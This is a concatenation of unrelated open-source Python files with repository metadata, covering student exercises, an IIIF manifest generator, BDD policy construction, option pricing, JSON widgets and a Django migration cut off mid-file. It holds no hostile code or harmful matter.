eb8d4c754ca229b83af47b3b9fe4488ffff6d4a6
|
/estrutura-de-repeticao/exercicio21.py
|
809b25edcd4e3b42617012296539bd9cf10a878c
|
[
"MIT"
] |
permissive
|
diegolinkk/exercicios-python-brasil
|
1e5e712e057e9819b8c14b1aa1c40fb94d6e31a1
|
3bf7bdf0e98cdd06c115eedae4fa01e0c25fdba5
|
refs/heads/main
| 2023-07-15T09:54:36.309310
| 2021-08-15T00:12:18
| 2021-08-15T00:12:18
| 358,438,830
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
#Faça um programa que peça um número inteiro e determine se ele é ou não um número primo.
# Um número primo é aquele que é divisível somente por ele mesmo e por 1.
numero = int(input("Digite um número: "))
divisor = numero
contador_divisoes_inteiras = 0
while divisor >=1:
if (numero % divisor) == 0:
contador_divisoes_inteiras +=1
divisor -=1
if contador_divisoes_inteiras <= 2:
print("O número é primo")
else:
print("O número não é primo")
|
[
"diegolinkk@gmail.com"
] |
diegolinkk@gmail.com
|
8912a74e600a883095b5af30146b2029ad3057ed
|
6b20e6a11842cf2f2624ec4f0387fab5305b4a09
|
/Nave.py
|
c4842d0e1577ffd99422f8ee1426c1bdb34a7bc9
|
[
"Apache-2.0"
] |
permissive
|
Albertojserr/Mi-Primer-Ejercicio-POO
|
3c14adbc19dcb4f6d039d301d2a12ce966141b96
|
3de8df95be8cd9894ea68c225822b1f9d4be6423
|
refs/heads/main
| 2023-08-27T19:27:22.451102
| 2021-10-29T14:52:50
| 2021-10-29T14:52:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,131
|
py
|
from Guerrero import Guerrero
from Marciano import Marciano
from Terricola import Terricola
class Nave():
def __init__(self, warrior_type, name="Millenium Falcon", crew=1):
if(not isinstance(crew,int)):
raise TypeError("crew is the number of warriors and should be an int")
elif(crew < 0):
raise ValueError("crew is the number of warriors and should be an int > 0")
elif(warrior_type == Marciano):
self.__type = warrior_type
self.__name = name
self.__crew = list()
for i in range (0,crew):
marciano_name="marciano" + str(i)
self.__crew.append(Marciano(marciano_name))
elif(warrior_type == Terricola):
self.__type = warrior_type
self.__name = name
self.__crew = list()
for i in range (0,crew):
terricola_name="terricola" + str(i)
self.__crew.append(Terricola(terricola_name))
else:
raise TypeError("TYPE of GUERREROS WRONG")
print("Created a ship " + self.__name + " of " + str(self.__type) + " with " + str(crew) + " members")
def __str__(self):
return self.__name + " OF " + str(len(self.__crew)) + " " + str(self.__type)
def get_shot(self,shot):
if(not isinstance(shot,int)):
raise TypeError("shot should be an int")
elif(shot == -1):
# A shot from a dead member
pass
elif(shot < 0 or shot > Guerrero.get_maxTarget()):
raise ValueError("shot OUT OF RANGE")
for i in range(0,len(self.__crew)):
if(self.__type == Marciano or self.__type == Terricola):
self.__crew[i].get_shot(shot)
else:
raise TypeError("TYPE of GUERREROS WRONG in the crew " + self.__crew)
def shoot(self,warrior):
if(warrior >= 0 and warrior < len(self.__crew)):
return self.__crew[warrior].shoot()
else:
raise ValueError("The warrior: " + str(warrior) + " does not exist in the ship: " + self.__name)
def membersAlive(self):
membersAlive=0
# I AM LAUNCHING AN IMPOSSIBLE EXCEPTION, SINCE IT CANT BE ANY NAVE WITH OTHER TYPE THAN MARCIANO OR TERRICOLA
# Read Constructor to double check it. That is why the exception is not documented
if(self.__type == Marciano or self.__type ==Terricola):
for warrior in self.__crew:
#We access the member of the grandparent class (SerVivo), that is shared by all warriors (Marciano and Terricola)!
if(warrior.is_vivo()):
membersAlive+=1
else:
raise TypeError("TYPE of GUERREROS WRONG ")
return membersAlive
def isWarriorAlive(self, warrior):
if(warrior >= 0 and warrior < len(self.__crew)):
return self.__crew[warrior].is_vivo()
else:
raise ValueError("The warrior: " + str(warrior) + " does not exist in the ship: " + self.__name)
def number_of_members(self):
return len(self.__crew)
|
[
"alberto.j.serrano@gmail.com"
] |
alberto.j.serrano@gmail.com
|
c6698562cc25684f53c90e7da85446bb439283a9
|
2ea49bfaa6bc1b9301b025c5b2ca6fde7e5bb9df
|
/contributions/mattia.penati/python/Data Structures/2016-09-13.py
|
78ee8b992e510f221264d582a1fae6cf11e8a12f
|
[] |
no_license
|
0x8801/commit
|
18f25a9449f162ee92945b42b93700e12fd4fd77
|
e7692808585bc7e9726f61f7f6baf43dc83e28ac
|
refs/heads/master
| 2021-10-13T08:04:48.200662
| 2016-12-20T01:59:47
| 2016-12-20T01:59:47
| 76,935,980
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 151
|
py
|
Best way to implement a simple `queue`
`Module`s everywhere!
Special attributes of objects and classes
Get the most of `int`s
Get the most of `float`s
|
[
"mattia.penati@gmail.com"
] |
mattia.penati@gmail.com
|
8ae147a4aa7b33753aea023f8e8f2d064f2e8ae8
|
aa196fe070c406ba2c1751081b9afccecb1abd5a
|
/src/04_CollectionGeneratorFromItemSets.py
|
efc7420c96eb2dcf62976975d1b8b41a8ad7e1d5
|
[] |
no_license
|
iii-dch/dataset
|
929f54285febfe7399b2ff1368da5efb7b4a0b4e
|
ebc6bf924ccb33780d55caa61a91f7db0754c4e2
|
refs/heads/master
| 2021-06-22T23:39:34.907627
| 2021-04-27T01:47:11
| 2021-04-27T01:47:11
| 175,349,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,669
|
py
|
import sys
import json
import argparse
import requests
import os
import glob
import yaml
import shutil
import datetime
from classes.downloader import Downloader
manifest_path = "../docs/iiif/collection"
Downloader.initDir(manifest_path)
f = open("settings.yml", "r+")
settings = yaml.load(f)
prefix = settings["github_pages_url"]
# ldファイルを使う
files = glob.glob("../docs/api/item_sets/*.json")
api_url = settings["api_url"]
for i in range(len(files)):
if i % 100 == 0:
print(str(i+1)+"/" + str(len(files)))
file = files[i]
with open(file) as f:
obj = json.load(f)
id = str(obj["o:id"])
url = api_url.replace(
"/api", "/iiif") + "/collection/" + id
collection = requests.get(url).json()
'''
manifest_uri = api_url.replace(
"/api", "/iiif") + "/" + str(id) + "/manifest"
# 画像なし
if len(obj["o:media"]) == 0:
continue
new_manifest_uri = manifest_uri_prefix + \
"/" + id + "/manifest.json"
medias = obj["o:media"]
canvases = []
metadata = []
for key in obj:
if ":" in key and "o:" not in key:
values = obj[key]
for value in values:
metadata.append({
"label" : value["property_label"],
"value" : value["@id"] if "@id" in value else value["@value"],
"term" : key
})
thumbnail = None
for j in range(len(medias)):
mid = medias[j]["@id"]
mpath = "../docs/api/media/" + mid.split("/")[-1]+".json"
with open(mpath) as f:
mdata = json.load(f)
url = mdata["o:source"]
h = 1
w = 1
index = str(j+1)
canvas = {
"@id": manifest_uri_prefix +"/" + id + "/canvas/p"+index,
"@type": "sc:Canvas",
"height": h,
"images": [
{
"@id": manifest_uri_prefix +"/" + id + "/annotation/p"+index.zfill(4)+"-image",
"@type": "oa:Annotation",
"motivation": "sc:painting",
"on": manifest_uri_prefix +"/" + id + "/canvas/p"+index,
"resource": {
"@id": url,
"@type": "dctypes:Image",
"format": "image/jpeg",
"height": h,
"width": w
}
}
],
"label": "["+index+"]",
"thumbnail": {
"@id": url,
},
"width": w
}
canvases.append(canvas)
if j == 0:
thumbnail = url
manifest_json = {
"@context": "http://iiif.io/api/presentation/2/context.json",
"@id": new_manifest_uri,
"@type": "sc:Manifest",
"label": obj["dcterms:title"][0]["@value"],
"metadata" : metadata,
"thumbnail" : thumbnail,
"attribution" : "東洋文庫 / Toyo Bunko",
"seeAlso" : prefix + "/api/items/"+ id + ".json",
"sequences": [
{
"@id": manifest_uri_prefix +"/" + id + "/sequence/normal",
"@type": "sc:Sequence",
"canvases" : canvases
}
]
}
if "dcterms:rights" in obj:
manifest_json["license"] = obj["dcterms:rights"][0]["@id"]
manifest_dir = manifest_path+"/"+id
os.makedirs(manifest_dir, exist_ok=True)
with open(manifest_dir+"/manifest.json", 'w') as outfile:
json.dump(manifest_json, outfile, ensure_ascii=False,
indent=4, sort_keys=True, separators=(',', ': '))
manifest = dict()
manifests.append(manifest)
manifest["@id"] = new_manifest_uri
manifest["@type"] = "sc:Manifest"
manifest["label"] = obj["dcterms:title"][0]["@value"]
manifest["thumbnail"] = thumbnail
manifest["metadata"] = metadata
if i == 0:
collection["thumbnail"] = thumbnail
'''
output_path = "../docs/iiif/collection/{}.json".format(id)
fw = open(output_path, 'w')
json.dump(collection, fw, ensure_ascii=False, indent=4,
sort_keys=True, separators=(',', ': '))
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
bf97ef06b952d115433a1b4263db21b5ebfb4b54
|
d056699ecbe8bcebf4ce63c7d590b7cb9eff6331
|
/old/policy.py
|
8b81fee7be775f47a04dbf2b39425032a9108a19
|
[
"MIT"
] |
permissive
|
QuMuLab/tempopem
|
66258eefb194fee0969530c8618d6de0bc08aa3e
|
1d578d9fb6b3bc87295527b152f142fe9dcd8546
|
refs/heads/master
| 2021-05-22T17:40:51.131378
| 2020-04-04T15:02:29
| 2020-04-04T15:02:29
| 253,025,451
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,344
|
py
|
import networkx as nx
NODE_COUNT = 0
class PolicyNode(object):
def __init__(self):
global NODE_COUNT
NODE_COUNT += 1
self.high = None
self.low = None
self.fluent = None
self.action = None
self.parents = []
self.hash_val = None
self.score = None
def is_true(self):
return (self.action is not None) and (self.action is not False)
def is_false(self):
return False == self.action
def set_high(self, high):
self.high = high
high.add_parent(self)
def set_low(self, low):
self.low = low
low.add_parent(self)
def add_parent(self, p):
self.parents.append(p)
def __repr__(self):
return self.__str__()
def __hash__(self):
return self.id()
def __cmp__(self, other):
return self.__hash__() == other.__hash__()
def __eq__(self, other):
return self.__cmp__(other)
def __neq__(self, other):
return not self.__cmp__(other)
class InnerNode(PolicyNode):
def __init__(self, fluent):
PolicyNode.__init__(self)
self.fluent = fluent
def label(self):
return str(self.fluent)
def id(self):
if self.hash_val is None:
self.hash_val = hash("%s/%d/%d" % (str(self.fluent), hash(self.high), hash(self.low)))
return self.hash_val
def __str__(self):
return "(%s: %s / %s)" % (str(self.fluent), str(self.high), str(self.low))
class LeafNode(PolicyNode):
def __init__(self, action):
PolicyNode.__init__(self)
self.action = action
self.high = self
self.low = self
def label(self):
return str(self.action)
def id(self):
if self.hash_val is None:
self.hash_val = hash(self.label())
return self.hash_val
def __str__(self):
return str(self.action)
FALSE = LeafNode(False)
LOOKUP_TABLE = {} # Maps fg and h to the proper root
NODE_LOOKUP = {} # Maps a node's id to the node itself
def compute_coverage(policy, max_depth, depth):
if not policy.score:
if policy.high.__class__ == InnerNode:
high_score = compute_coverage(policy.high, max_depth, depth+1)
else:
if policy.high is not FALSE:
high_score = 2 ** (max_depth - depth - 1)
else:
high_score = 0
if policy.low.__class__ == InnerNode:
low_score = compute_coverage(policy.low, max_depth, depth+1)
else:
if policy.low is not FALSE:
low_score = 2 ** (max_depth - depth - 1)
else:
low_score = 0
policy.score = high_score + low_score
return policy.score
def generate_graph(policy):
graph = nx.DiGraph()
nodes = set()
def build_graph(node):
if node not in nodes:
nodes.add(node)
graph.add_node(node)
if node.__class__ == InnerNode:
build_graph(node.high)
build_graph(node.low)
if node.high == node.low:
graph.add_edge(node, node.high, high = -1)
else:
graph.add_edge(node, node.high, high = 1)
graph.add_edge(node, node.low, high = 0)
build_graph(policy)
return graph
def generate_dot(policy, graph = None):
if not graph:
graph = generate_graph(policy)
dot_string = "\ndigraph Policy {\n"
for node in graph.nodes():
dot_string += " %d [label=\"%s\"];\n" % (hash(node), node.label())
for (u,v) in graph.edges():
if hash(u) != hash(v):
is_high = graph.get_edge_data(u,v)['high']
if 0 != is_high:
dot_string += " %d -> %d;\n" % (hash(u), hash(v))
if 1 != is_high:
dot_string += " %d -> %d [style=dotted];\n" % (hash(u), hash(v))
dot_string += "}\n"
return dot_string
def generate_dump(policy, graph = None):
if not graph:
graph = generate_graph(policy)
dump_string = "%d\n" % policy.num_fluents
dump_string += "%d\n" % policy.id()
dump_string += "%d\n" % graph.number_of_nodes()
for node in graph.nodes():
dump_string += "%d/%s\n" % (node.id(), node.label())
edge_count = 0
edge_dump = ""
for (u,v) in graph.edges():
if hash(u) != hash(v):
is_high = graph.get_edge_data(u,v)['high']
if 0 != is_high:
edge_dump += "%d/%d/h\n" % (u.id(), v.id())
edge_count += 1
if 1 != is_high:
edge_dump += "%d/%d/l\n" % (u.id(), v.id())
edge_count += 1
dump_string += "%d\n" % edge_count
dump_string += edge_dump
return dump_string
def generate_stats(policy, graph = None):
if not graph:
graph = generate_graph(policy)
return (graph.number_of_nodes(), graph.number_of_edges())
def ITE(fg, h):
global FALSE, LOOKUP_TABLE, NODE_LOOKUP
if (fg.__class__ == InnerNode) and (h.__class__ == InnerNode):
if not (fg.fluent == h.fluent):
print fg.fluent
print h.fluent
assert fg.fluent == h.fluent
# Base cases
if fg.is_true():
return fg
if FALSE == fg:
return h
if FALSE == h:
return fg
if fg.id() == h.id():
return h
# Check hash on (fg, h)
hash_val = "%d/%d" % (fg.id(), h.id())
if hash_val in LOOKUP_TABLE:
return LOOKUP_TABLE[hash_val]
T = ITE(fg.high, h.high)
E = ITE(fg.low, h.low)
#####################################################################
## Attempt to hash the individual nodes to avoid re-creating them. ##
#####################################################################
new_node_key = "%s/%d/%d" % (str(fg.fluent), hash(T), hash(E))
if new_node_key in NODE_LOOKUP:
root = NODE_LOOKUP[new_node_key]
else:
root = InnerNode(fg.fluent)
root.set_high(T)
if T.id() == E.id():
root.set_low(T)
else:
root.set_low(E)
NODE_LOOKUP[new_node_key] = root
#root = InnerNode(fg.fluent)
#root.set_high(T)
#
#if T.id() == E.id():
# root.set_low(T)
#else:
# root.set_low(E)
# Insert (fg, h) -> root into the table
LOOKUP_TABLE[hash_val] = root
#print "fg: %s" % str(fg)
#print "h: %s" % str(h)
#print "T: %s" % str(T)
#print "E: %s" % str(E)
#print "ITE: %s\n" % str(root)
return root
def generate_primitive_policy(prec_set, ordering):
unseen = prec_set.prec
if not unseen:
return LeafNode(prec_set.candidate)
prev_f = ordering[0]
current = InnerNode(prev_f)
root = current
for f in ordering[1:]:
if prev_f in unseen:
saw_previous = True
unseen.remove(prev_f)
else:
saw_previous = False
if 0 == len(unseen):
act_node = LeafNode(prec_set.candidate)
current.set_high(act_node)
current.set_low(FALSE)
return root
choice = InnerNode(f)
current.set_high(choice)
if saw_previous:
current.set_low(FALSE)
else:
current.set_low(choice)
current = choice
prev_f = f
if prev_f in unseen:
unseen.remove(prev_f)
if 0 == len(unseen):
act_node = LeafNode(prec_set.candidate)
current.set_high(act_node)
current.set_low(FALSE)
return root
print "Error: Prec set wasn't used up by the ordering: %s / %s" % (str(prec_set), str(ordering))
return None
def generate_variable_ordering(reg_list, mapping):
seen = set()
ordering = []
for r in reg_list:
for item in r:
for ps in mapping[item]:
new_vars = set(ps.prec) - seen
ordering.extend(sorted(list(new_vars), cmp=lambda x,y: cmp(str(x), str(y))))
seen |= new_vars
return ordering
def generate_policy(reg_list, mapping):
global LOOKUP_TABLE
LOOKUP_TABLE = {}
# Get the ordering
ordering = generate_variable_ordering(reg_list, mapping)
#print "Ordering:\n%s" % "\n".join([str(item) for item in ordering])
import sys
# Generate all of the primitive policies
prim_policies = []
for r in reg_list:
for item in r:
for ps in mapping[item]:
prim_policies.append(generate_primitive_policy(ps, ordering))
#for pp in prim_policies:
#print pp
#print "<<<"
#global NODE_COUNT
#print "Node count: %d" % NODE_COUNT
# Iteratively create our large policy
policy = prim_policies.pop(0)
print "Iteratively building the ITE..."
last = 0.0
top_num = float(len(prim_policies))
while prim_policies:
#print str(sys.getsizeof(prim_policies[-1]))
progress = (top_num - float(len(prim_policies))) / top_num
if progress + 0.1 > last:
last += 0.1
print "%3.1f%% Complete" % (progress * 100)
#print len(prim_policies)
#print "Current: %s" % str(policy)
policy = ITE(policy, prim_policies.pop(0))
print "\nNodes used: %d\n" % NODE_COUNT
policy.num_fluents = len(ordering)
return policy
|
[
"christian.muise@gmail.com"
] |
christian.muise@gmail.com
|
4914ad00a676e04f4ad6a79cb4558ee4d81d7cf5
|
a61136759e6af85ca4b0a5c3e0de5885bca50406
|
/IndividualOptions/BarrierOptions/BarrierKnockInCallPut4.py
|
7f00e14186191835be9f0a4eb069eb87a14338d8
|
[] |
no_license
|
JorisVlaar/F4E-Project-Part-2-Group-29
|
c626436ce0f557cda17377ea8b8d33f54935ff1b
|
7c2d28e770ab89ed8371f2c97839ba966cb7a253
|
refs/heads/main
| 2023-09-02T08:15:45.385603
| 2021-11-02T11:56:30
| 2021-11-02T11:56:30
| 416,730,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,130
|
py
|
# A Program to find the value of an EU Call option using the binomial tree method
from Tool import findStockPrices as fsp
import math
def find_values(prices, PExercise, option):
if option == "Call":
for i in range(len(prices)):
prices[i] = max(0, prices[i] - PExercise)
elif option == "Put":
for i in range(len(prices)):
prices[i] = max(0, PExercise - prices[i])
return prices
def find_value(prices, periods, q, R):
step = periods
values = []
for i in range(periods):
top = 0
for j in range(step):
value = ((q * prices[top]) + ((1 - q) * prices[top + 1])) * (1 / R)
values.append(value)
top += 1
prices = list.copy(values)
values.clear()
step -= 1
return prices
def find_line_position(KIPrice, PStock, u, d):
position = 0
if KIPrice > PStock:
while PStock * u < KIPrice:
position += 1
PStock = PStock * u
if KIPrice < PStock:
while PStock * d > KIPrice:
position += 1
PStock = PStock * d
return position
def find_paths(periods):
values = []
previous = []
for i in range(1, periods+1):
values.append(1)
for j in range(len(previous)-1):
values.append(previous[j]+previous[j+1])
values.append(1)
previous = list.copy(values)
values.clear()
return previous
def find_paths_via(lines, step):
paths = 0
previous = []
step2 = 0
for i in range(1, int(lines) + 1):
if i == 1:
paths += 1
elif i == 2:
for j in range(1, step + 2):
paths += 1
previous.append(1)
elif i > 2:
for k in previous:
step2 += k
for j in range(0, step + 1):
paths += step2
pop = previous.pop(j)
previous.insert(j, step2)
step2 -= pop
lines -= 1
previous.clear()
for i in range(1, int(lines) + 1):
if i == 1:
paths += 1
elif i == 2:
for j in range(1, step + 2):
paths += 1
previous.append(1)
elif i > 2:
for k in previous:
step2 += k
for j in range(0, step + 1):
paths += step2
pop = previous.pop(j)
previous.insert(j, step2)
step2 -= pop
return paths
def some_name(prices, periods, KIPrice, PStock, linePosition):
lines = int(periods/2)
step = lines
if periods % 2 == 0:
step -= 1
for i in range(1, 1 + linePosition):
if periods % 2 == 0:
if i % 2 == 0:
step -= 1
else:
lines -= 1
else:
if i % 2 == 0:
lines -= 1
else:
step -= 1
if lines <= 0:
lines = 0
if step <= 0:
step = 0
actualPrices = []
if KIPrice > PStock:
index = 0
for k in prices:
if k >= KIPrice:
print(find_paths(periods)[index])
actualPrices.append(find_paths(periods)[index])
index += 1
linesCopy = lines
for i in range(linesCopy):
actualPrices.append(find_paths_via(lines, step))
index += 1
lines -= 1
step += 1
if lines == 1:
step = 0
for j in range(len(actualPrices), len(prices)):
actualPrices.append(0)
return actualPrices
elif KIPrice < PStock:
index = len(prices) - 1
for k in prices:
if k <= KIPrice:
actualPrices.append(find_paths(periods)[index])
index -= 1
actualPrices.reverse()
linesCopy = lines
for i in range(linesCopy):
actualPrices.append(find_paths_via(lines, step))
index -= 1
lines -= 1
step += 1
if lines == 1:
step = 0
for j in range(len(actualPrices), len(prices)):
actualPrices.append(0)
actualPrices.reverse()
return actualPrices
def find_value_probability(prices, paths, pathsVia, R, periods):
value = 0
path = 0
for i in paths:
path += i
for i in range(len(prices)):
value += (prices[i] / pow(R, periods)) * (pathsVia[i]/path)
return value
# inputs:
PStock = 41
PExercise = 37
KnockInPrice = 42
volatility = 0.4
maturity = 90 / 365
periodLength = 30 / 365
interest = 0.1
opttype = "Put" # Option Type 'C' or 'P'
# computed values:
periods = int(maturity / periodLength)
u = math.exp(volatility * math.sqrt(periodLength))
d = 1 / u
R = math.exp(interest * periodLength)
q = (R - d) / (u - d)
stockPrices = fsp.find_final_prices(PStock, u, d, periods)
optionPayOff = find_values(list.copy(stockPrices), PExercise, opttype)
print(stockPrices)
print(optionPayOff)
print(find_value(optionPayOff, periods, q, R)[0])
print("-------")
print(some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)))
print(find_value_probability(optionPayOff, find_paths(periods), some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)), R, periods))
# value = 100000000000000000000000
# periods = 5
# while periods <= 80:
# print(periods)
# periodLength = maturity/periods
# u = math.exp(volatility * math.sqrt(periodLength))
# d = 1 / u
# R = math.exp(interest * periodLength)
# q = (R - d) / (u - d)
# stockPrices = fsp.find_final_prices(PStock, u, d, periods)
# optionPayOff = find_values(list.copy(stockPrices), PExercise, opttype)
# value1 = find_value_probability(optionPayOff, find_paths(periods), some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)), R, periods)
# print(value1)
# if value1 > value:
# value = value1
# periods += 1
#
# print("-------")
# print(value)
|
[
"j.f.vlaar@student.utwente.nl"
] |
j.f.vlaar@student.utwente.nl
|
a86c159050ee04f45dbaea716accb29cd8f21b10
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5631572862566400_0/Python/Yaksha/C.py
|
42b9cbfef65ada5bb000995cbdc1565d9b560d9e
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,372
|
py
|
def solveEndedLoops(endedLoops):
longestList = 0
reverseEndedLoops = [x[::-1] for x in endedLoops]
for (index, item) in enumerate(endedLoops):
if len(item) > longestList:
longestList = len(item)
for (index2, item2) in enumerate(reverseEndedLoops):
if index == index2:
continue
if len(item) + len(item2) - 1 < longestList:
continue
if item[-1] in item2:
pos = item2.index(item[-1])
newlist = item + item2[pos+1:]
else:
newlist = item + item2
if len(newlist) < longestList:
continue
if len(newlist) == len(set(newlist)):
if len(newlist) > longestList:
longestList = len(newlist)
return longestList
def solveloops(n, BFF):
BFF = [-1] + BFF
circularLoops = []
endedloops = []
closedPairs = []
for i in range(1, len(BFF)):
loop = [i]
next = BFF[i]
while True:
if len(loop) == 2 and next == loop[0]:
closedPairs.append(loop)
break
if len(loop) > 2 and next == loop[0]:
circularLoops.append(loop)
break
if len(loop) > 2 and next == loop[-2]:
endedloops.append(loop)
break
if next in loop:
break
loop.append(next)
next = BFF[next]
maxClosedPairs = len(closedPairs)
if circularLoops:
maxCircurlarLoops = max([len(x) for x in circularLoops])
else:
maxCircurlarLoops = 0
maxEndedLoops = solveEndedLoops(endedloops)
print(closedPairs)
print(circularLoops)
print(endedloops)
return max([maxClosedPairs, maxCircurlarLoops, maxEndedLoops])
FILENAME = "C-small-attempt2"
with open(FILENAME + ".in") as infile:
with open(FILENAME + ".out", 'w') as outfile:
numCases = int(infile.readline())
for i in range(numCases):
numKids = int(infile.readline())
bffs = infile.readline().split()
bffs = [int(x) for x in bffs]
outfile.write("Case #%d: %s\n" % (i + 1, solveloops(numKids, bffs)))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
d2bd8e2345dc2cf48c72ef12d9b46d5b9429970c
|
50c7d7f94263b250bba1ded2b247925ff4e28cf8
|
/server/marsHandler.py
|
b96b6048794c4275cb2580e66a13e9bfd1ffe581
|
[
"MIT"
] |
permissive
|
jmaggio14/goddard
|
8bce241ed19b27249b3707f98784bbf13c90d0ea
|
f34755c9fbd982b2965d9b23685df0f21ebaff08
|
refs/heads/master
| 2021-01-12T13:25:32.669157
| 2016-09-25T18:43:23
| 2016-09-25T18:43:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
# Copyright (c) 2016, Jeffrey Maggio and Joseph Bartelmo
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
# LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import threading
import sys
import logging
from select import select
sys.path.insert(0, '../mars')
import run as Mars #note as long as __main__ is defined this will write a usage violation to the console
MARS_EXIT_COMMAND = 'exit'
class MarsThread(threading.Thread):
'''
The idea here is that the client will connect
And we want to keep mars chugging when the client losses connection.
We want to easily reconnnect, so we stick with queues here, mars won't stop
until mars is explicitly stopped or watchdog stop is triggered
'''
def __init__(self, configuration, marsCommandQueue, marsConnectionQueue, marsOnlineQueue, debugEnabled = False):
super(MarsThread, self).__init__()
self._stop = threading.Event()
self.config = configuration
self.marsCommandQueue = marsCommandQueue
self.marsConnectionQueue = marsConnectionQueue
self.marsOnlineQueue = marsOnlineQueue
self.debugEnabled = debugEnabled
def run(self):
Mars.run(self.config, self.marsCommandQueue, self.marsConnectionQueue, self.marsOnlineQueue, self.debugEnabled)
'''
Here we are on death. Usually Because mars quit, we would expect all logging to stop,
but it persists because we still have the server up.
To prevent logging handlers from just getting indefinitely larger, we remove them all on quit of mars
'''
debugLog = logging.getLogger('mars_logging')
telemetryLog = logging.getLogger('telemetry_logging')
debugLog.handlers = []
telemetryLog.handlers = []
def stop(self):
self.marsCommandQueue.put(MARS_EXIT_COMMAND)
|
[
"joebartelmo@gmail.com"
] |
joebartelmo@gmail.com
|
604a43b12f74c9ec9bf3bce3255baee25371282e
|
d445c40666165b0fea9b7cb00de882b5aaa7882a
|
/src/py/wxyz_core/src/wxyz/core/widget_json.py
|
cb607e01ded9e0ce61065d5b17a69e59b9b01c42
|
[
"BSD-3-Clause"
] |
permissive
|
nrbgt/wxyz
|
9e5d995b4eb76ddbdd459940ecefe6d5a5c326d3
|
663cf6593f4c0ca12f7b94b61e34c0a8d3cbcdfd
|
refs/heads/master
| 2023-05-13T07:55:19.518188
| 2020-02-23T02:07:17
| 2020-02-23T02:07:17
| 296,402,747
| 1
| 0
|
BSD-3-Clause
| 2020-09-17T17:56:30
| 2020-09-17T17:56:29
| null |
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
""" Widgets for working with JSON
"""
# pylint: disable=no-self-use
import json
import jsonpointer
import jsonschema
from .base import Fn, T, W
@W.register
class JSON(Fn):
""" A JSON parsing functional widget
"""
_model_name = T.Unicode("JSONModel").tag(sync=True)
value = T.Union(
[T.Dict(), T.List(), T.Unicode(), T.Int(), T.Float()], allow_none=True
).tag(sync=True)
def the_function(self, source):
""" parse some JSON
"""
return json.loads(source)
@W.register
class JSONPointer(Fn):
""" A JSON pointer resolver
"""
_model_name = T.Unicode("JSONPointerModel").tag(sync=True)
source = T.Dict(allow_none=True).tag(sync=True)
pointer = T.Unicode(allow_none=True).tag(sync=True)
_observed_traits = ["source", "pointer"]
def the_function(self, source, pointer):
""" point at some json
"""
return jsonpointer.resolve_pointer(source, pointer)
@W.register
class JSONSchema(Fn):
""" A JSON schema validator
"""
_model_name = T.Unicode("JSONSchemaModel").tag(sync=True)
source = T.Dict(allow_none=True).tag(sync=True)
schema = T.Dict(allow_none=True).tag(sync=True)
value = T.Dict(allow_none=True).tag(sync=True)
_observed_traits = ["source", "schema"]
def the_function(self, source, schema):
""" validate some JSON
"""
jsonschema.validate(source, schema)
return source
|
[
"nick.bollweg@gmail.com"
] |
nick.bollweg@gmail.com
|
c1aaf6c50d07538695d2394c07416afb1c37b478
|
44ff65fdce9ba204bbc1673c2bec1cc46e70bda5
|
/projeto/dimensoes/migrations/0001_initial.py
|
c2c840d1fcaf8141e410eff1c5508d32a38bb974
|
[] |
no_license
|
leopesi/pool_budget
|
4c0c7ac7b718bacc6312585d3519497ac9c641d9
|
30e81e07a91659a16e84cd04eff20ea4e6a9c6dd
|
refs/heads/main
| 2022-12-13T08:54:50.762224
| 2022-03-22T00:56:16
| 2022-03-22T00:56:16
| 249,777,827
| 1
| 0
| null | 2022-12-08T03:52:48
| 2020-03-24T17:47:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,597
|
py
|
# Generated by Django 4.0.3 on 2022-03-22 00:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ClienteModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
('sobrenome', models.CharField(max_length=30)),
('estado', models.CharField(blank=True, max_length=15)),
('cidade', models.CharField(blank=True, max_length=20)),
('bairro', models.CharField(blank=True, max_length=20)),
('rua', models.CharField(blank=True, max_length=100)),
('numero_casa', models.CharField(blank=True, max_length=10)),
('cep', models.CharField(blank=True, max_length=20)),
